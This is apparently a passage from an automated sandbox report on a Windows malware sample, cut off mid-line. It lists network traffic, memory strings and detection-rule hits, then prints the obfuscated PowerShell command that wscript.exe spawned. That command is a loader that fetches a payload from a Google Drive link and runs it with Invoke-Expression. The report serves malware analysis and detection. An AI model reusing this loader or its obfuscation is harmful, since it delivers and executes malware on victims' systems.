Source: global traffic
HTTP traffic detected:
  GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Connection: Keep-Alive
Source: global traffic
HTTP traffic detected:
  GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic
HTTP traffic detected:
  GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic
HTTP traffic detected:
  GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic
HTTP traffic detected:
  GET /line/?fields=hosting HTTP/1.1
  Host: ip-api.com
  Connection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079442238.000001EA79110000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186b73
Source: wscript.exe, 00000000.00000003.2070135793.000001EA79419000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.googPb
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGP
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGXR
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://www.gstatic.com
Source: unknown
Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown
Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown
Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown
Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown
Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown
Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown
Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown
Network traffic detected: HTTP traffic on port 443 -> 49701
Source: amsi32_6136.amsi.csv, type: OTHER
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution. Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution. Author: ditekSHen
Source: C:\Windows\System32\wscript.exe
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplO |